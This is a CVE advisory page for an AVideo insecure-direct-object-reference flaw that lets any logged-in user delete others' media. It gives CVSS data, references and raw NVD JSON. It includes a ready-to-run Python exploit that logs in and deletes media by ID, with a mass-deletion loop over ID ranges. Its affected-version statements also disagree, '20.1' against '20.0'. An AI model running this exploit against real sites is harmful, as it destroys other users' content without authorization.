CVE-2025-34435

Description

AVideo versions prior to 20.1 are vulnerable to an insecure direct object reference (IDOR) that allows any authenticated user to delete media files belonging to other users. The affected endpoint validates authentication but fails to verify ownership or edit permissions for the targeted video.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:* - VULNERABLE

AVideo < 20.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3 """ CVE-2025-34435 PoC - AVideo IDOR Arbitrary File Deletion This PoC demonstrates how an authenticated user can delete arbitrary media files belonging to other users due to missing ownership verification. """ import requests import json from typing import Optional, Dict class AVideoIDORExploit: def __init__(self, target_url: str, username: str, password: str): self.target_url = target_url.rstrip('/') self.username = username self.password = password self.session = requests.Session() self.logged_in = False def login(self) -> bool: """ Authenticate to the AVideo platform """ login_url = f"{self.target_url}/login.json" data = { 'user': self.username, 'pass': self.password } try: response = self.session.post(login_url, data=data, timeout=10) if response.status_code == 200: result = response.json() if result.get('status') == 'success': self.logged_in = True print(f"[+] Successfully logged in as {self.username}") return True print("[-] Login failed") return False except Exception as e: print(f"[-] Login error: {e}") return False def delete_media(self, media_id: int) -> bool: """ Delete arbitrary media file by ID (IDOR vulnerability) Target must be authenticated but does not need ownership """ if not self.logged_in: print("[-] Not logged in. Call login() first.") return False delete_url = f"{self.target_url}/objects/mediaDelete.json.php" data = {'id': media_id} try: response = self.session.post(delete_url, data=data, timeout=10) if response.status_code == 200: result = response.json() if result.get('status') == 'success': print(f"[+] Successfully deleted media ID: {media_id}") return True else: print(f"[-] Failed to delete media ID: {media_id} - {result.get('msg', 'Unknown error')}") return False return False except Exception as e: print(f"[-] Delete error: {e}") return False def mass_delete(self, start_id: int, end_id: int) -> Dict: """ Mass delete media files by iterating through IDs """ results = {'success': 0, 'failed': 0} for media_id in range(start_id, end_id + 1): if self.delete_media(media_id): results['success'] += 1 else: results['failed'] += 1 return results if __name__ == "__main__": # Configuration TARGET = "https://target-avideo-site.com" USERNAME = "[email protected]" PASSWORD = "password123" TARGET_MEDIA_ID = 12345 # Victim's media ID # Initialize exploit exploit = AVideoIDORExploit(TARGET, USERNAME, PASSWORD) # Step 1: Login with attacker account if exploit.login(): # Step 2: Delete victim's media file without ownership exploit.delete_media(TARGET_MEDIA_ID) # Optional: Mass deletion # results = exploit.mass_delete(1, 100) # print(f"Results: {results}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-34435
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-34435
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-34435/
[4] VulDB https://vuldb.com/cve/CVE-2025-34435
[5] https://chocapikk.com/posts/2025/avideo-security-vulnerabilities/
[6] https://github.com/WWBN/AVideo/commit/275a54268b
[7] https://github.com/WWBN/AVideo/commit/4a53ab2056
[8] https://www.vulncheck.com/advisories/avideo-idor-arbitrary-file-deletion

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-34435", "sourceIdentifier": "[email protected]", "published": "2025-12-17T20:15:53.883", "lastModified": "2025-12-19T19:15:50.937", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "AVideo versions prior to 20.1 are vulnerable to an insecure direct object reference (IDOR) that allows any authenticated user to delete media files belonging to other users. The affected endpoint validates authentication but fails to verify ownership or edit permissions for the targeted video."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndExcluding": "20.0", "matchCriteriaId": "383A7EA7-DFBC-4127-981F-552BFD0B3CED"}]}]}], "references": [{"url": "https://chocapikk.com/posts/2025/avideo-security-vulnerabilities/", "source": "[email protected]"}, {"url": "https://github.com/WWBN/AVideo/commit/275a54268b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WWBN/AVideo/commit/4a53ab2056", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.vulncheck.com/advisories/avideo-idor-arbitrary-file-deletion", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}